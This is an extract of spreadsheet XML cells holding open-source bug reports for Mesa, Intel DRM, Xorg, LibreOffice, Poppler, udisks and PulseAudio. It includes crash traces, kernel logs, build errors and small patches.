NTGLOBALFLAG:  70
APPLICATION_VERIFIER_FLAGS:  0
PRIMARY_PROBLEM_CLASS:  STATUS_BREAKPOINT
BUGCHECK_STR:  APPLICATION_FAULT_STATUS_BREAKPOINT
LAST_CONTROL_TRANSFER:  from 6b2e3921 to 6b2e36df
STACK_TEXT:  
00a7fb04 6b2e3921 00000000 0122dd70 00000080 MSVCR100D!_fsopen+0x6f [f:\dd\vctools\crt_bld\self_x86\crt\src\fopen.c @ 54]
00a7fb1c 01226780 00a7fb48 00000000 0122dd70 MSVCR100D!fopen_s+0x81 [f:\dd\vctools\crt_bld\self_x86\crt\src\fopen.c @ 160]
00a7fb54 012221ce 00000000 00a7fb7c 00a7fb90 shader_runner!piglit_load_text_file+0x40 [c:\piglit\tests\util\shader-load.c @ 52]
00a7fb84 01223262 00000000 00000000 00a7fbb4 shader_runner!process_test_script+0x2e [c:\piglit\tests\shaders\shader_runner.c @ 501]
00a7fba4 01226a73 00000001 00c41480 00000000 shader_runner!piglit_init+0xb2 [c:\piglit\tests\shaders\shader_runner.c @ 805]
00a7fbc0 012272df 00000001 00c41480 00c419e0 shader_runner!main+0x153 [c:\piglit\tests\util\piglit-framework.c @ 116]
00a7fc10 0122710f 00a7fc24 75701194 7ffdd000 shader_runner!__tmainCRTStartup+0x1bf [f:\dd\vctools\crt_bld\self_x86\crt\src\crtexe.c @ 555]
00a7fc18 75701194 7ffdd000 00a7fc64 76fab495 shader_runner!mainCRTStartup+0xf [f:\dd\vctools\crt_bld\self_x86\crt\src\crtexe.c @ 371]
00a7fc24 76fab495 7ffdd000 7794127b 00000000 kernel32!BaseThreadInitThunk+0xe
00a7fc64 76fab468 01227100 7ffdd000 00000000 ntdll!__RtlUserThreadStart+0x70
00a7fc7c 00000000 01227100 7ffdd000 00000000 ntdll!_RtlUserThreadStart+0x1b
FOLLOWUP_IP: 
MSVCR100D!_fsopen+6f [f:\dd\vctools\crt_bld\self_x86\crt\src\fopen.c @ 54]
6b2e36df cc              int     3
FAULTING_SOURCE_CODE:  
No source found for 'f:\dd\vctools\crt_bld\self_x86\crt\src\fopen.c'
SYMBOL_STACK_INDEX:  0
SYMBOL_NAME:  msvcr100d!_fsopen+6f
FOLLOWUP_NAME:  MachineOwner
MODULE_NAME: MSVCR100D
IMAGE_NAME:  MSVCR100D.dll
DEBUG_FLR_IMAGE_TIMESTAMP:  4ba1dbd4
STACK_COMMAND:  dt ntdll!LdrpLastDllInitializer BaseDllName  dt ntdll!LdrpFailureData  ~0s  kb
FAILURE_BUCKET_ID:  STATUS_BREAKPOINT_80000003_MSVCR100D.dll!_fsopen
BUCKET_ID:  APPLICATION_FAULT_STATUS_BREAKPOINT_msvcr100d!_fsopen+6f
Followup: MachineOwner
---------</t>
  </si>
  <si>
    <t>CAIRO-9122</t>
  </si>
  <si>
    <t>inline keyword is not recognize by native compiler</t>
  </si>
  <si>
    <t>I had to add
#define inline
in config.h to compile cairo-1.2.6</t>
  </si>
  <si>
    <t>DRI-81377</t>
  </si>
  <si>
    <t>[IVB/BDW Bisected]igt/kms_mmio_vs_cs_flip/setcrtc_vs_cs_flip fails</t>
  </si>
  <si>
    <t>Created attachment 102844
dmesg
==System Environment==
--------------------------
Regression: Yes
Here has a bug 79290 on -next-queued(d3b448d9917a3d6531e499d88bfb13ea5e31e4ad)
Non-working platforms: BSW
==kernel==
--------------------------
origin/drm-intel-nightly: 2a38e1bcd4dc9523cd723291340226d139bece1b(fails)
    drm-intel-nightly: 2014y-07m-14d-23h-18m-30s integration manifest
origin/drm-intel-next-queued: ebcdf5276e6e2ddef6a4fd7716684030301a6fed(fails)
    drm/i915: Handle failure to kick out a conflicting fb driver
origin/drm-intel-fixes: c6930992948adf0f8fc1f6ff1da51c5002a2cf95(fails)
    Revert drm/i915: reverse dp link param selection prefer fast over wide again
==Bug detailed description==
igt/kms_mmio_vs_cs_flip/setcrtc_vs_cs_flip fails
Output:
[root@x-ivb9 tests]# ./kms_mmio_vs_cs_flip --run-subtest setcrtc_vs_cs_flip
IGT-Version: 1.7-g3f50598 (x86_64) (Linux: 3.16.0-rc4_drm-intel-next-queued_ebcdf5_20140715+ x86_64)
Test assertion failure function igt_wait_for_vblank file igt_kms.c:1475:
Failed assertion: drmWaitVBlank(drm_fd &amp;wait_vbl) == 0
Last errno: 16 Device or resource busy
Subtest setcrtc_vs_cs_flip: FAIL
==Reproduce steps==
---------------------------- 
1. ./kms_mmio_vs_cs_flip --run-subtest setcrtc_vs_cs_flip</t>
  </si>
  <si>
    <t>MESA-29782</t>
  </si>
  <si>
    <t>[regression] Humus Domino demo: pieces no longer fall over</t>
  </si>
  <si>
    <t>The glsl2 merge has introduced a regression in the Domino demo from Humus the pieces no longer fall over but remain standing up.
All shaders report compile status ok.
http://www.humus.name/index.php?page=3D&amp;ID=72</t>
  </si>
  <si>
    <t>DRI-87855</t>
  </si>
  <si>
    <t>[BDW]igt/kms_flip/rcs-wf_vblank-vs-dpms causes *ERROR* too many voltage retries give up</t>
  </si>
  <si>
    <t>Created attachment 111506
test log
==System Environment==
--------------------------
Regression: not sure
Non-working platforms: BDW
==kernel==
--------------------------
drm-intel-nightly/4fa23142a15526f4a4b5df61f26eacdd558a849a
commit 4fa23142a15526f4a4b5df61f26eacdd558a849a
Author: Daniel Vetter 
Date:   Fri Dec 19 15:33:33 2014 +0100
    drm-intel-nightly: 2014y-12m-19d-14h-33m-07s UTC integration manifest
==Bug detailed description==
-----------------------------
It causes [  993.707284] [drm:intel_dp_start_link_train [i915]] *ERROR* too many voltage retries give up on drm-intel-nightly kernel when run automation testing. run the binary I am unable to reproduce the fail. I am not sure which case impacts it.
Following cases also has this error:
igt/kms_flip/flip-vs-dpms-off-vs-modeset
igt/kms_flip/flip-vs-dpms-off-vs-modeset-interruptible
igt/kms_flip/single-buffer-flip-vs-dpms-off-vs-modeset
igt/kms_flip/single-buffer-flip-vs-dpms-off-vs-modeset-interruptible
==Reproduce steps==
---------------------------- 
1. Run full igt</t>
  </si>
  <si>
    <t>MESA-89477</t>
  </si>
  <si>
    <t>include/no_extern_c.h:47:1: error: template with C linkage</t>
  </si>
  <si>
    <t>mesa: bf061a3d2ec00aa486cda0fb4af04e50e8522868 (master 10.6.0-devel)
  CXX      codegen/nv50_ir_from_tgsi.lo
In file included from ../../../../include/c99_compat.h:28:0
                 from ../../../../src/gallium/include/pipe/p_compiler.h:32
                 from ../../../../src/gallium/auxiliary/tgsi/tgsi_dump.h:31
                 from codegen/nv50_ir_from_tgsi.cpp:24:
../../../../include/no_extern_c.h:47:1: error: template with C linkage
 template class _IncludeInsideExternCNotPortable
 ^
Build error is introduced with commit bfb4db83b618d57fcc5f0c9e9fdb3a7ff33d07f3.
commit bfb4db83b618d57fcc5f0c9e9fdb3a7ff33d07f3
Author: JosÃ© Fonseca 
Date:   Thu Dec 11 22:14:14 2014 +0000
    include: Add helper header to help trap includes inside extern C.
    This is just to help repro and fixing these issues with any C++ compiler --</t>
  </si>
  <si>
    <t>UDISKS-91191</t>
  </si>
  <si>
    <t>udisks1 systemd service file has incorrect installation path substitution</t>
  </si>
  <si>
    <t>The sed snippet for substituting the systemd service file path in udisks1 is:
sed -e s|\@libexecdir\@|$(prefix)/lib/udisks| $ $@
Unfortunately udisks-daemon is installed into libexecdir so this ends up being wrong:
https://bugzilla.redhat.com/show_bug.cgi?id=1238664</t>
  </si>
  <si>
    <t>XORG-16673</t>
  </si>
  <si>
    <t>Radeon HD 2400 Pro -- Monitor not detected</t>
  </si>
  <si>
    <t>On my Samsung X11 with Radeon HD 2400 Pro and a Docking Station the Monitor on the DVI-Output is only detected when using the option HPD off .
HPD swap is also not working.
xrandr -v
Server reports RandR version 1.2
Thanks for this driver its much better then fglrx!!</t>
  </si>
  <si>
    <t>LIBREOFFICE-43586</t>
  </si>
  <si>
    <t>[UI] Need more room for localized string: named ranges</t>
  </si>
  <si>
    <t>The new localized Named range dialog need more room for Range Options string.
The patch below fixes it.
Images attached showinf results</t>
  </si>
  <si>
    <t>PM-UTILS-19646</t>
  </si>
  <si>
    <t>pm-utils-1.2.3 pkg-config file has syntax errors.</t>
  </si>
  <si>
    <t>From our downstream bug report:
https://bugs.gentoo.org/show_bug.cgi?id=254492
pm-utils.pc contains:
pm_powerhooks=${pm_libdir)/power.d
{ isn't matched by a proper } which causes the problem.</t>
  </si>
  <si>
    <t>UDISKS-26822</t>
  </si>
  <si>
    <t>Benchmarking fails with Error seeking to position-1836040192 for (null): Invalid argument</t>
  </si>
  <si>
    <t>Distro: Ubuntu 9.10 (+ some 10.04 packages)
Kernel: 2.6.32-14-generic
UDisks package version: 1.0.0~git20100223.a38230-2ubuntu1
When I try to benchmark my hard disk it fail.
This is the manual udisk command:
$ sudo /usr/lib/udisks/udisks-helper-drive-benchmark /dev/sda 0
udisks-helper-progress: 0.0
read_transfer_rate: offset 0 rate 50121963.552517
udisks-helper-progress: 0.000000
read_transfer_rate: offset 409821184 rate 50161531.921785
read_transfer_rate: offset 819642368 rate 50068291.105993
read_transfer_rate: offset 1229463552 rate 50186590.338347
read_transfer_rate: offset 1639284736 rate 50145967.676659
read_transfer_rate: offset 2049105920 rate 50103384.598795
Error seeking to position -1836040192 for (null): Invalid argument
$ sudo fdisk -l
Disk /dev/sda: 82.0 GB 81964302336 bytes
255 heads 63 sectors/track 9964 cylinders
Units = cylinders of 16065 * 512 = 8225280 bytes
Sector size (logical / optimal IO): 512 bytes / 512 bytes
Disk identifier: 0x92899289
[...]
$ sudo hdparm -I /dev/sda
/dev/sda:
ATA device with non-removable media
 Model Number: Maxtor 6Y080L0
 Serial Number: Y3JNVAEE
 Firmware Revision: YAR41VW0
Standards:
 Used: ATA/ATAPI-7 T13 1532D revision 0
 Supported: 7 6 5 4
Configuration:
 Logical max current
 cylinders 16383 16383
 heads 16 16
 sectors/track 63 63
 --
 CHS current addressable sectors: 16514064
 LBA user addressable sectors: 160086528
 LBA48 user addressable sectors: 160086528
 Logical/Physical Sector size: 512 bytes
 device size with M = 1024*1024: 78167 MBytes
 device size with M = 1000*1000: 81964 MBytes (81 GB)
 cache/buffer size = 2048 KBytes (type=DualPortCache)
[...]
Benchmark only work with USB sticks. All USB sticks that I have it's OK.
Benchmark fail with every other HD that I have.</t>
  </si>
  <si>
    <t>dnax88</t>
  </si>
  <si>
    <t>MESA-62756</t>
  </si>
  <si>
    <t>Rendering errors on rv790 with llvm and unigine heaven 3.0</t>
  </si>
  <si>
    <t>Created attachment 77043
heaven + llvm on rv790 rendering errors.
rv790 with git mesa and svn llvm testing unigine heaven 3.0 like -
MESA_EXTENSION_OVERRIDE=-GL_ARB_shader_bit_encoding  force_glsl_extensions_warn=true  ./heaven
I haven't tested this for a while - it was OK sometime ago with FDO llvm but now I am getting some rendering errors (scree shot attached) with current mesa git and llvm svn.
I tried finding a working commit going back with mesa but I get to a point where llvm renders nothing at all with anything using current llvm svn.
R600_LLVM=0 has no problems.</t>
  </si>
  <si>
    <t>POPPLER-9860</t>
  </si>
  <si>
    <t>low resolution graphic appears smoothed</t>
  </si>
  <si>
    <t>Forwarded from: http://bugzilla.gnome.org/show_bug.cgi?id=331781
I have a graphic showing a low resolution image with graph axes superimposed
saved as both EPS and PDF. When I view either file with Evince the graphic
appears smoothed. When I view the PDF with Acroread I can see the individual
pixels.
I have uploaded three files to demonstrate the problem (the PNG shows the graph
as I want it to appear):
http://www.magres.nottingham.ac.uk/~magill/pixels/pixels.png
http://www.magres.nottingham.ac.uk/~magill/pixels/pixels.pdf
http://www.magres.nottingham.ac.uk/~magill/pixels/pixels.eps
I am using Gentoo Linux fluxbox evince 0.5.0 poppler-0.5.0-r5 (cairo)
Steps to reproduce:
1. open pixels.eps
2. open pixels.pdf
3. compare to pixels.png
Actual results:
The image appears as a smooth gradient.
The PDF shows a white border on the bottom and right edges of the image and
colourbar.
Expected results:
see pixels.png - I expect to see individual pixels in the image and no white
border on the PDF. The PDF file displays as expected in Acroread. The EPS file
appears correct if displayed with xv.
I can confirm this is only reproducible with cairo backend.</t>
  </si>
  <si>
    <t>XORG-21363</t>
  </si>
  <si>
    <t>unable to find a valid framebuffer device with UseFBDev</t>
  </si>
  <si>
    <t>With linux kernel 2.6.29.1 xorg is unable to find my
framebuffer device when I turn on UseFBDev (see log below).
The following patch seems to fix it.
--- xorg-server-1.6.1.orig/hw/xfree86/fbdevhw/fbdevhw.c 2009-04-23 20:04:20.000000000 +0200
+++ xorg-server-1.6.1/hw/xfree86/fbdevhw/fbdevhw.c      2009-04-23 20:04:55.000000000 +0200
@@ -3147 +3147 @@
     for (i = 0 i &lt; 8 i++) {
        sprintf(filename 
-               /sys/bus/pci/devices/%04x:%02x:%02x.%d/graphics/fb%d
+               /sys/bus/pci/devices/%04x:%02x:%02x.%d/graphics:fb%d
                pPci-&gt;domain pPci-&gt;bus pPci-&gt;dev pPci-&gt;func i)
        fd = open(filename O_RDONLY 0)
(II) Loading /usr/lib/xorg/modules//libvgahw.so
(II) Module vgahw: vendor=X.Org Foundation
        compiled for 1.6.1 module version = 0.1.0
        ABI class: X.Org Video Driver version 5.0
(--) MGA(0): Chipset: mgag400 (G400)
(**) MGA(0): Depth 24 (--) framebuffer bpp 32
(==) MGA(0): RGB weight 888
(**) MGA(0): Option HWcursor off
(**) MGA(0): Option UseFBDev true
(==) MGA(0): Using AGP 1x mode
(**) MGA(0): Using SW cursor
(==) MGA(0): Using XAA acceleration
(**) MGA(0): Using framebuffer device
(II) Loading sub module fbdevhw
(II) LoadModule: fbdevhw
(II) Loading /usr/lib/xorg/modules/linux//libfbdevhw.so
(II) Module fbdevhw: vendor=X.Org Foundation
        compiled for 1.6.1 module version = 0.0.2
        ABI class: X.Org Video Driver version 5.0
(WW) open /dev/fb2: No such file or directory
(WW) open /dev/fb3: No such file or directory
(WW) open /dev/fb4: No such file or directory
(WW) open /dev/fb5: No such file or directory
(WW) open /dev/fb6: No such file or directory
(WW) open /dev/fb7: No such file or directory
(EE) Unable to find a valid framebuffer device
(EE) MGA(0): Failed to open framebuffer device consult warnings and/or errors above for possible reasons
        (you may have to look at the server log to see warnings)</t>
  </si>
  <si>
    <t>XORG-9797</t>
  </si>
  <si>
    <t>If PANORAMIX not defined still need SyntheticMotion defined</t>
  </si>
  <si>
    <t>If you don't define PANORAMIX you still need to define SyntheticMotion in dix/events.c to complete compilation. Found compiling with WIN32 for Xming.</t>
  </si>
  <si>
    <t>LIBREOFFICE-73891</t>
  </si>
  <si>
    <t>UI color panel does not show the actual color</t>
  </si>
  <si>
    <t>In LO40 and earlier the Font Color Background Color and Highlight Color panels (in all components) identified the actual color by a small frame. Although awkward this feature helped if one wanted to apply the same color for a different object. Since the new color panel with more colors introduced in LO41 there is no such functionality and there is now way how to find out which color does an object have. Thus one cannot apply the same color to a different piece of text object etc. I find this to be very annoying.
Moreover functionality of these icons is different in different LO components.
If I set font color in Calc the icon keeps the color even if I click on text with different color. This a good feature and can be used to recolor multiple pieces of text. In Writer or Impress when clicking on text with different color the actual color of the icon updates. So when I want to use the same color for different pieces of text I have to remember coordinates of the color in the panel.
I normally use in presentation just two colors - black and some highlight color. Even in this simple case the panel does not help me in setting the right color. What I (and maybe others too) would love to see is a color panel which shows a list of colors used in the document. This would remove all my problems with setting the color.
--
Milos</t>
  </si>
  <si>
    <t>msramek22</t>
  </si>
  <si>
    <t>POPPLER-89827</t>
  </si>
  <si>
    <t>[patch] fix pdftops git 30mar15 regression where -passfonts and some other options no longer have an effect</t>
  </si>
  <si>
    <t>Created attachment 114734
patch to fix the problem
Recent changes to the command line processing moved some options from GlobalParams to PSOutputDev.
The options used to be set by calling setters in GlobalParams before creating the PSOutputDev.
Now the options are set by calling setters in PSOutputDev after it is created.
The problem is that PSOutputDev() calls init() which uses options that now can not be set until later after PSOutputDev() returns.
These patches split some of the code of init() into a new postInit() that is automatically called later after the pdftops main program has had a chance to set the command line options.
When I was looking through the code I also fixed a misspelling of sanitizedTitle as sanitizedTile.</t>
  </si>
  <si>
    <t>UPOWER-70283</t>
  </si>
  <si>
    <t>Some properties are never set</t>
  </si>
  <si>
    <t>Causing major regressions in GNOME.</t>
  </si>
  <si>
    <t>LIBREOFFICE-33156</t>
  </si>
  <si>
    <t>Missing information that Movie / Sound will be linked not embedded</t>
  </si>
  <si>
    <t>Hi
I figure out the following:
Create a new Impress File (Saved later at: \userspace\myfiles\impress\new.odp)
Insert a new movie file   (stored on the PC at \userspace\myvideo\new.ogg)
Insert a second movie file (stored on a USB Drive \usbdrive\video\new1.avi)
Save your work and start presenation.
It works fine.
Now carry your work on a stick (or send it via email) to another PC. 
Open presentation.
There are no movies to watch. You'll see a great questionmark.
Ok. Although i thought i've insert the movies may they are just linked?
Next step:
Store the movie files byside the presentation on the stick and try again on the second PC.
Just as little as before it doesn't work.
You can see the movies just as they are stored in the same folder as on the first PC. But you never see a hint or question that this is the problem.
So i take a look in the content.xml of my presentation and i see this :
- 
I thing there should be a user - hint that media (movie) files are only linked to the document AND that it would be easyier to put them in the same folder with the presentation - before using it.
Much better it will be if impress dosen't find the linked content it looks out for it in the same folder along the stored pesentation file.
And if there isn't the required file then the questionmark is changed to a little text e.g.: the file \usbdrive\video\new1.avi is missing .
Regards
Volker</t>
  </si>
  <si>
    <t>MESA-97476</t>
  </si>
  <si>
    <t>Shader binaries should not be stored in the PipelineCache</t>
  </si>
  <si>
    <t>Right now the anv_pipeline_cache object owns the storage for the shaders and their metadata: bind maps prog_data etc.  However according to the Vulkan spec:
&gt; The following object types are consumed when they are passed into a Vulkan
&gt; command and not further accessed by the objects they are used to create.
&gt; They can be destroyed at any time they are not in use by an API command:
&gt;
&gt;  * VkShaderModule
&gt;  * VkPipelineCache
Instead we need to have global storage for shader binaries and related data probably reference-count it per-shader and make the cache a dumb map from SHA1s to shaders (and maybe own a reference to each of them?)</t>
  </si>
  <si>
    <t>XORG-22045</t>
  </si>
  <si>
    <t>free memory deref in damage on server exit</t>
  </si>
  <si>
    <t>On OpenBSD with malloc flag set to put '0xdf' on every free'd memory chunk Xserver 1.6 aborts on the exit path because of a free memory access in shadow. 
Backtrace: 
Program received signal SIGBUS Bus error.
0x001e5bc0 in damageRemoveDamage (pPrev=0xdfdfdfdf pDamage=0x2b2fd380)
    at damage.c:1697
1697        while (*pPrev)
(gdb) p pPrev
$1 = (DamagePtr *) 0xdfdfdfdf
(gdb) bt
#0  0x001e5bc0 in damageRemoveDamage (pPrev=0xdfdfdfdf pDamage=0x2b2fd380)
    at damage.c:1697
#1  0x001e67f8 in DamageUnregister (pDrawable=0x2dc86640 pDamage=0x2b2fd380)
    at damage.c:2001
#2  0x28ee8988 in shadowRemove (pScreen=0x26f57400 pPixmap=0x2dc86640)
    at shadow.c:219
#3  0x28ee84c0 in shadowCloseScreen (i=0 pScreen=0x26f57400) at shadow.c:103
#4  0x0012f024 in miDCCloseScreen (index=0 pScreen=0x26f57400)
    at midispcur.c:175
#5  0x00140380 in miPointerCloseScreen (index=0 pScreen=0x26f57400)
    at mipointer.c:161
#6  0x0014a0b8 in miSpriteCloseScreen (i=0 pScreen=0x26f57400)
    at misprite.c:320
#7  0x000bd418 in CMapCloseScreen (i=0 pScreen=0x26f57400) at xf86cmap.c:230
#8  0x275ca1b4 in WsfbCloseScreen ()
   from /usr/X11R6/lib/modules/drivers/wsfb_drv.so
#9  0x000b80dc in VidModeClose (i=0 pScreen=0x26f57400) at xf86VidMode.c:116
#10 0x00187220 in CursorCloseScreen (index=0 pScreen=0x26f57400)
    at cursor.c:186
#11 0x001db614 in AnimCurCloseScreen (index=0 pScreen=0x26f57400)
    at animcur.c:136
#12 0x0017d9f8 in compCloseScreen (index=0 pScreen=0x26f57400)
    at compinit.c:84
#13 0x22113c74 in glxCloseScreen (index=0 pScreen=0x26f57400)
    at glxscreens.c:217
#14 0x0002a244 in main (argc=3 argv=0xbfffc120 envp=0xbfffc130) at main.c:429
(gdb)</t>
  </si>
  <si>
    <t>PULSEAUDIO-53036</t>
  </si>
  <si>
    <t>Assertion 'device-&gt;playback_channels || device-&gt;capture_channels' failed at modules/alsa/alsa-ucm.c:250 function ucm_get_device_property(). Aborting.</t>
  </si>
  <si>
    <t>I got this:
Assertion 'device-&gt;playback_channels || device-&gt;capture_channels' failed at modules/alsa/alsa-ucm.c:250 function ucm_get_device_property(). Aborting.
I have done zero investigation but I think it happened because the configuration doesn't specify the number of channels for either playback or capture. PulseAudio shouldn't crash on UCM configuration errors.</t>
  </si>
  <si>
    <t>LIBREOFFICE-39504</t>
  </si>
  <si>
    <t>PRINTING. table/cell borders is very thin and light</t>
  </si>
  <si>
    <t>When I print writer's table with borders or spreadsheet with cell borders they are printed like very thin and light. I can't even to do scan it on scanner (to show you result) because they are very very thin.
Steps:
1. Create new document.
2. Create new table.
3. Print it.
OS: Windows XP SP3 x86 
LO 3.4.1
Printer: HP LaserJet P2015 Series
When I'm using Microsoft Office or Microsoft WordPad - everything is fine.
When I print the same on another computer with another printer (but the same model) - everything is fine. So I decided to install this printer to another PC. But the problem is still there.
It's looks like the problem exact with this one printer. But another applications print fine.</t>
  </si>
  <si>
    <t>sash_kr</t>
  </si>
  <si>
    <t>POPPLER-46744</t>
  </si>
  <si>
    <t>[patch] pdftops git 29feb12 -passfonts regression</t>
  </si>
  <si>
    <t>Created attachment 57789
patch against poppler cloned from git on 29Feb12
When a PDF references a non-embedded font the git version of pdftops ignores -passfonts and attempts to embed an external font.
This is a regression from 0.18.4 on two counts.
First when pdftops embeds the font it creates a font with the name referenced in the pdf even if it embeds a substitute.  This makes the generated EPS file misleading because pre-flight scans of the EPS won't generate warnings about missing fonts but the file will print incorrectly even if the printer has the correct font.
Second even if pdftops embeds a font with the same name the font might be different for example the Linux system running pdftops might have a low quality free font while the printer might have a high quality commercial font.
In addition I have a workflow with a lot of little files that all use a small number of fonts.  For a sample 2326 byte PDF pdftops 0.18.4 generated a 18080 byte EPS while the new git version generates a 1157015 byte EPS over 60X as large due to the embedded font (which happens to be a substitution anyway).  I have to build PS pages that each contain several hundred of these files and all of the extra copies of the font add up.
It seems like someone tried to replace psSubstFonts with psFontPassthrough in GlobalParams but pdftops.cc sets psSubstFonts while GfxFont.cc tests psFontPassthrough.  I made the smallest change to get -passfonts working which was restoring GlobalParams::getPSSubstFonts() and testing globalParams-&gt;getPSSubstFonts() in GfxFont::locateFont().  This restores the behavior of 0.18.4 (and previous versions).
William</t>
  </si>
  <si>
    <t>DRI-36048</t>
  </si>
  <si>
    <t>[965GM] Resume ends with plasma effect</t>
  </si>
  <si>
    <t>It's now a big lottery to 'suspend/resume' my Lenovo T61 GMA965 - this problem is quite longterm - it happened from time to time in the past but disabling drm_kms_helper thread seemed to minimize it.
However now with kernel 2.6.39-rcX - it strikes back with full power - nothing seems to help - and it's like 1 from 3-4 resumes ends with plasma effect on resume -  when this happens - the only way to have the laptop usable is to make a full reboot - machine seems to work OK - but without display it's not really useful.
I'm attaching phone video grab of such plasma effect.
Recently there are some extra warnings in the message log - but they are probably unrelated to real cause - they are just side effect - when I tried after such broken resume to suspend machine again.
So here is the log from 'resume -&gt; (plasma) -&gt; suspend -&gt; resume...'
 Freezing user space processes ... (elapsed 0.01 seconds) done.
 Freezing remaining freezable tasks ... (elapsed 0.01 seconds) done.
 sd 0:0:0:0: [sda] Synchronizing SCSI cache
 sd 0:0:0:0: [sda] Stopping disk
 sdhci-pci 0000:15:00.3: PCI INT C disabled
 sdhci-pci 0000:15:00.2: PCI INT C disabled
 ehci_hcd 0000:00:1d.7: PCI INT D disabled
 ata_piix 0000:00:1f.1: PCI INT C disabled
 uhci_hcd 0000:00:1d.2: PCI INT C disabled
 uhci_hcd 0000:00:1d.0: PCI INT A disabled
 uhci_hcd 0000:00:1d.1: PCI INT B disabled
 ehci_hcd 0000:00:1a.7: PCI INT C disabled
 uhci_hcd 0000:00:1a.1: PCI INT B disabled
 uhci_hcd 0000:00:1a.0: PCI INT A disabled
 i915 0000:00:02.0: power state changed by ACPI to D3
 HDA Intel 0000:00:1b.0: PCI INT B disabled
 hci_cmd_timer: hci0 command tx timeout
 e1000e 0000:00:19.0: PCI INT A disabled
 e1000e 0000:00:19.0: wake-up capability enabled by ACPI
 PM: suspend of devices complete after 451.401 msecs
 ehci_hcd 0000:00:1d.7: power state changed by ACPI to D3
QUEST on wlan0 to 192.168.192.1 port 67
 uhci_hcd 0000:00:1d.2: power state changed by ACPI to D3
 uhci_hcd 0000:00:1d.0: power state changed by ACPI to D3
 ehci_hcd 0000:00:1a.7: power state changed by ACPI to D3
 uhci_hcd 0000:00:1a.1: power state changed by ACPI to D3
 PM: late suspend of devices complete after 56.886 msecs
 ACPI: Preparing to enter system sleep state S3
 PM: Saving platform NVS memory
 Disabling non-boot CPUs ...
 CPU 1 is now offline
 lockdep: fixing up alternatives.
 Extended CMOS year: 2000
 ACPI: Low-level resume complete
 PM: Restoring platform NVS memory
 Extended CMOS year: 2000
 Enabling non-boot CPUs ...
 lockdep: fixing up alternatives.
 Booting Node 0 Processor 1 APIC 0x1
 Switched to NOHz mode on CPU #1
 NMI watchdog enabled takes one hw-pmu counter.
 CPU1 is up
 ACPI: Waking up from system sleep state S3
 uhci_hcd 0000:00:1a.1: power state changed by ACPI to D0
 uhci_hcd 0000:00:1a.1: power state changed by ACPI to D0
 uhci_hcd 0000:00:1a.1: power state changed by ACPI to D0
 uhci_hcd 0000:00:1a.1: power state changed by ACPI to D0
 ehci_hcd 0000:00:1a.7: power state changed by ACPI to D0
 ehci_hcd 0000:00:1a.7: power state changed by ACPI to D0
 uhci_hcd 0000:00:1d.0: power state changed by ACPI to D0
 uhci_hcd 0000:00:1d.0: power state changed by ACPI to D0
 uhci_hcd 0000:00:1d.0: power state changed by ACPI to D0
 uhci_hcd 0000:00:1d.0: power state changed by ACPI to D0
 uhci_hcd 0000:00:1d.2: power state changed by ACPI to D0
 uhci_hcd 0000:00:1d.2: power state changed by ACPI to D0
 uhci_hcd 0000:00:1d.2: power state changed by ACPI to D0
 uhci_hcd 0000:00:1d.2: power state changed by ACPI to D0
 ehci_hcd 0000:00:1d.7: power state changed by ACPI to D0
 ehci_hcd 0000:00:1d.7: power state changed by ACPI to D0
 sdhci-pci 0000:15:00.2: BAR 0: set to [mem 0xf8301000-0xf83010ff] (PCI address [0xf8301000-0xf83010ff])
 sdhci-pci 0000:15:00.3: BAR 0: set to [mem 0xf8301400-0xf83014ff] (PCI address [0xf8301400-0xf83014ff])
 PM: early resume of devices complete after 47.461 msecs
 i915 0000:00:02.0: power state changed by ACPI to D0
 i915 0000:00:02.0: power state changed by ACPI to D0
 e1000e 0000:00:19.0: wake-up capability disabled by ACPI
 uhci_hcd 0000:00:1a.0: PCI INT A -&gt; GSI 20 (level low) -&gt; IRQ 20
 usb usb2: root hub lost power or was reset
 uhci_hcd 0000:00:1a.1: power state changed by ACPI to D0
 uhci_hcd 0000:00:1a.1: power state changed by ACPI to D0
 uhci_hcd 0000:00:1a.1: PCI INT B -&gt; GSI 21 (level low) -&gt; IRQ 21
 usb usb3: root hub lost power or was reset
 ehci_hcd 0000:00:1a.7: power state changed by ACPI to D0
 ehci_hcd 0000:00:1a.7: power state changed by ACPI to D0
 ehci_hcd 0000:00:1a.7: PCI INT C -&gt; GSI 22 (level low) -&gt; IRQ 22
 HDA Intel 0000:00:1b.0: PCI INT B -&gt; GSI 17 (level low) -&gt; IRQ 17
 uhci_hcd 0000:00:1d.0: power state changed by ACPI to D0
 uhci_hcd 0000:00:1d.0: power state changed by ACPI to D0
 uhci_hcd 0000:00:1d.0: PCI INT A -&gt; GSI 16 (level low) -&gt; IRQ 16
 usb usb4: root hub lost power or was reset
 uhci_hcd 0000:00:1d.1: PCI INT B -&gt; GSI 17 (level low) -&gt; IRQ 17
 usb usb6: root hub lost power or was reset
 uhci_hcd 0000:00:1d.2: power state changed by ACPI to D0
 uhci_hcd 0000:00:1d.2: power state changed by ACPI to D0
 uhci_hcd 0000:00:1d.2: PCI INT C -&gt; GSI 18 (level low) -&gt; IRQ 18
 usb usb7: root hub lost power or was reset
 ehci_hcd 0000:00:1d.7: power state changed by ACPI to D0
 ehci_hcd 0000:00:1d.7: power state changed by ACPI to D0
 ehci_hcd 0000:00:1d.7: PCI INT D -&gt; GSI 19 (level low) -&gt; IRQ 19
 ata_piix 0000:00:1f.1: PCI INT C -&gt; GSI 16 (level low) -&gt; IRQ 16
 sdhci-pci 0000:15:00.2: PCI INT C -&gt; GSI 18 (level low) -&gt; IRQ 18
 sdhci-pci 0000:15:00.2: Will use DMA mode even though HW doesn't fully claim to support it.
 sdhci-pci 0000:15:00.3: PCI INT C -&gt; GSI 18 (level low) -&gt; IRQ 18
 sd 0:0:0:0: [sda] Starting disk
 ata4.00: ACPI cmd ef/03:42:00:00:00:a0 (SET FEATURES) filtered out
 ata4.00: ACPI cmd ef/03:0c:00:00:00:a0 (SET FEATURES) filtered out
 ata4.00: configured for UDMA/33
 ata3: SATA link down (SStatus 0 SControl 300)
 usb 2-2: reset full speed USB device number 3 using uhci_hcd
 ata1: SATA link up 1.5 Gbps (SStatus 113 SControl 300)
 ata1.00: ACPI cmd f5/00:00:00:00:00:a0 (SECURITY FREEZE LOCK) filtered out
 ata1.00: ACPI cmd ef/10:03:00:00:00:a0 (SET FEATURES) filtered out
 ata1.00: ACPI cmd f5/00:00:00:00:00:a0 (SECURITY FREEZE LOCK) filtered out
 ata1.00: ACPI cmd ef/10:03:00:00:00:a0 (SET FEATURES) filtered out
 ata1.00: configured for UDMA/100
 thinkpad_acpi: ACPI backlight control delay disabled
 PM: resume of devices complete after 3425.635 msecs
 Restarting tasks ... 
 done.
 video LNXVIDEO:00: Restoring backlight state
